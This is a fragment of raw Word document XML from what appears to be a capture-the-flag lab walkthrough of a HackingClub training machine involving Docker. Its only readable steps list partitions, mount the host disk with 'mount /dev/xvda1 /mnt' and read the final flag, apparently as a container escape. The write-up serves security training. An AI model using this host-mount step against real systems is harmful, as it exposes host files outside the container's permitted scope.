      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069">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A">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Listing partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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66"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Mount:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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mount /dev/xvda1 /mnt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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simply read the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">final flag</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7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05000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="61"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943600" cy="1905000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId36" w:type="default"/>
      <w:headerReference r:id="rId37" w:type="first"/>
      <w:headerReference r:id="rId38" w:type="even"/>
      <w:footerReference r:id="rId39" w:type="default"/>
      <w:footerReference r:id="rId40" w:type="first"/>
      <w:footerReference r:id="rId41"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2">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="11"/>
    <w:bookmarkEnd w:id="11"/>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8" name="image11.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image1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73">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74">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9" name="image1.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image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Registry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2.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://entrypoint.sh" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.digitalocean.com/community/tutorials/como-construir-imagens-docker-e-hospedar-um-repositorio-de-imagens-docker-com-o-gitlab-p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5.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.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hyperlink" Target="https://app.hackingclub.com/training/training-machines/35"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8.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.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9.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E1+dU16cN3frM+FuBUsq2tbhGQ==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLmRxZTBtNXhvdWpmMzIOaC5zeGI1cmFqZnZ1aWQyDmgud3ljbGx5Zzh4Zm5pMg5oLjhsZXVtNjZsNzExZDIOaC5kcXE1dGdibm83bnkyDmguOWdzM2d1Y3V5dm5sMg5oLm9xejByMzk4OTRibzIOaC4xNzVmNWNzOTR6MG84AHIhMXlGTmFJbkxpQ3hOV21TYnNaVm5sRldOUnZVYlpXeW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